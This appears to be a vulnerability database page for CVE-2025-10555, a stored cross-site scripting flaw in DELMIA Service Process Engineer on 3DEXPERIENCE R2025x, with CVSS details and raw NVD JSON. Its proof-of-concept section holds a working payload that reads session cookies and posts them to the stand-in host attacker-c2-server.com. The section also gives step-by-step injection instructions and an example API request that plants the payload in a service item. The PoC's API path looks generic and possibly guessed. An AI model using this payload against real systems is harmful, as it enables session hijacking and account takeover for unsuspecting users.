Security Vulnerability Report
CVE-2025-10555 CVSS 8.7 HIGH

CVE-2025-10555

Published: 2025-11-24 16:15:48
Last Modified: 2026-04-15 00:35:42

Description

A stored Cross-site Scripting (XSS) vulnerability affecting Service Items Management in DELMIA Service Process Engineer on Release 3DEXPERIENCE R2025x allows an attacker to execute arbitrary script code in a user's browser session.

CVSS Details

CVSS Score
8.7
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

DELMIA Service Process Engineer R2025x (all versions)
3DEXPERIENCE R2025x (affected version)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
JavaScript
// CVE-2025-10555 PoC - Stored XSS in DELMIA Service Process Engineer
// Target: Service Items Management in 3DEXPERIENCE R2025x
// Note: This PoC is for educational and authorized testing purposes only

// Malicious payload to be injected into Service Item name/description field
const xssPayload = '<script>\n' +
  '  // Steal session cookies\n' +
  '  var cookies = document.cookie;\n' +
  '  var xhr = new XMLHttpRequest();\n' +
  '  xhr.open("POST", "https://attacker-c2-server.com/exfil", true);\n' +
  '  xhr.setRequestHeader("Content-Type", "application/json");\n' +
  '  xhr.send(JSON.stringify({\n' +
  '    "cve": "CVE-2025-10555",\n' +
  '    "cookies": cookies,\n' +
  '    "url": window.location.href,\n' +
  '    "userAgent": navigator.userAgent\n' +
  '  }));\n' +
  '</script>';

// Attack flow:
// 1. Attacker with low privilege access logs into 3DEXPERIENCE platform
// 2. Navigate to DELMIA > Service Process Engineer > Service Items Management
// 3. Create new or edit existing Service Item
// 4. Inject XSS payload into name/description field
// 5. Save the Service Item - payload is now stored persistently
// 6. When any user views the affected Service Item, payload executes

// Example API request structure (if API access available):
const exploitRequest = {
  method: 'POST',
  url: '/api/v1/service-items',
  headers: {
    'Content-Type': 'application/json',
    'Authorization': 'Bearer <attacker_token>'
  },
  body: {
    name: xssPayload,
    description: 'Malicious Service Item',
    category: 'Test'
  }
};

console.log('CVE-2025-10555 PoC Generated');
console.log('Payload length:', xssPayload.length, 'characters');

References

https://www.3ds.com/trust-center/security/security-advisories/cve-2025-10555
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-10555",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-24T16:15:48.047",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A stored Cross-site Scripting (XSS) vulnerability affecting Service Items Management in DELMIA Service Process Engineer on Release 3DEXPERIENCE R2025x allows an attacker to execute arbitrary script code in user's browser session."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N",
            "baseScore": 8.7,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 5.8
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.3ds.com/trust-center/security/security-advisories/cve-2025-10555",
        "source": "[email protected]"
      }
    ]
  }
}